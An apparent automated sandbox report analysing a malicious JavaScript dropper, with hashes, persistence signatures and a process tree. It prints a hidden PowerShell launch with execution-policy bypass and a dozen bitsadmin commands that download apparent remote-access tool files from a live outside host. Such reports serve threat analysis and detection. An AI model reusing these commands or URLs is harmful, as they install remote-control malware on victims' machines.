Overview

overview

10

Static

static

1

933861b752..._JC.js

windows7-x64

10

933861b752..._JC.js

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    25-08-2023 13:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6_JC.js

  • Size

    37KB

  • MD5

    c15beea0035b0ac586f27895a29a04f4

  • SHA1

    937d9d8eaac5a6ef16ce8bcae4b084a3603a49a3

  • SHA256

    933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6

  • SHA512

    ecbf688b91157e375fff3fa0b6d001a80e69d1a11d9467f38dbcab08714f87564cfcbaf49ab8637010db2c2974b73f863f39856d10cd6275abd4f1873e0d0145

  • SSDEEP

    768:r4mmlLumMT+Sh5+nyZcUtu/tWnm8raemrwzyWM6j:0mmlLg7hdtwWnzraemrcMw

Score
10/10
persistence

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tukudewe.com/js/01b1v2g3.zip
exe.dropper

https://tukudewe.com/js/h3b2_jsg/

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 12 IoCs
    dropper
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\933861b75227a3f4727b5872fa9da1b049e420632f8a9198987e8bfbaf7da9e6_JC.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Roaming\qlp37v2.ps1
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/AudioCapture.dll C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\AudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2988
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/client32.exe C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\client32.exe
        3⤵
        • Download via BitsAdmin
        PID:808
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/client32.ini C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\client32.ini
        3⤵
        • Download via BitsAdmin
        PID:2712
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/HTCTL32.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\HTCTL32.DLL
        3⤵
        • Download via BitsAdmin
        PID:2788
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/msvcr100.dll C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\msvcr100.dll
        3⤵
        • Download via BitsAdmin
        PID:568
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/nskbfltr.inf C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\nskbfltr.inf
        3⤵
        • Download via BitsAdmin
        PID:3020
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/NSM.LIC C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\NSM.LIC
        3⤵
        • Download via BitsAdmin
        PID:2288
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/pcicapi.dll C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\pcicapi.dll
        3⤵
        • Download via BitsAdmin
        PID:2352
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/PCICHEK.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\PCICHEK.DLL
        3⤵
        • Download via BitsAdmin
        PID:1456
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/PCICL32.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\PCICL32.DLL
        3⤵
        • Download via BitsAdmin
        PID:2992
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/remcmdstub.exe C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\remcmdstub.exe
        3⤵
        • Download via BitsAdmin
        PID:2256
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer Spadow /download /priority normal https://tukudewe.com/js/h3b2_jsg/TCCTL32.DLL C:\Users\Admin\AppData\Roaming\MsEdgeSandbox\TCCTL32.DLL
        3⤵
        • Download via BitsAdmin
        PID:2172

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\qlp37v2.ps1
    Filesize

    1KB

    MD5

    900df524f9233924d73694b5d1a4796e

    SHA1

    0f39bb7dd04aa79b118694e6d59a5408aa72c724

    SHA256

    d036c7ce56f45a2d1c9602bac0ffe66fcf70f618fa39852c13108550bbc1af3d

    SHA512

    12fb44e3112032112d1e017a15c2a49c34946d6135722bccc7e7a3c67e3324a3374ae66fb4df6b2e1108b0c409a32a8cc60997d4c18f6e63f9dc51b1eba2735b

    Download Submit

  • memory/2860-12-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2860-8-0x0000000002590000-0x0000000002598000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2860-6-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2860-10-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-11-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-9-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-13-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-7-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2860-15-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2860-16-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-17-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-18-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-19-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2860-21-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

    Filesize

    9.6MB

    Download